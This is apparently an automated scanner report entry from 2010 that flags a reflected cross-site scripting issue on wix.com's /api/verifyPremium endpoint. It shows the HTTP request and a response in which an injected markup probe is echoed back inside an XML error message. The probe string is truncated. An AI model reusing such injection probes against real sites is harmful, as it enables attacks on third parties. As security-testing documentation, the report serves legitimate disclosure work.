1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.wix.com |
Path: | /api/verifyPremium |
GET /api/verifyPremium?docId Accept: */* Accept-Language: en-US Referer: http://static.wix.com x-flash-version: 10,1,102,64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: www.wix.com Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 18:27:39 GMT Server: Apache Cache-Control: max-age=604800 Expires: Sat, 27 Nov 2010 18:27:39 GMT Vary: Accept-Encoding Content-Type: text/xml;charset=UTF-8 Content-Length: 282 <Result success="false" errorCode="-54" errorDescription="Field pFlags is not integer - NumberFormatException: 19ebcc2<a xmlns:a='http://www.w3 ...[SNIP]... |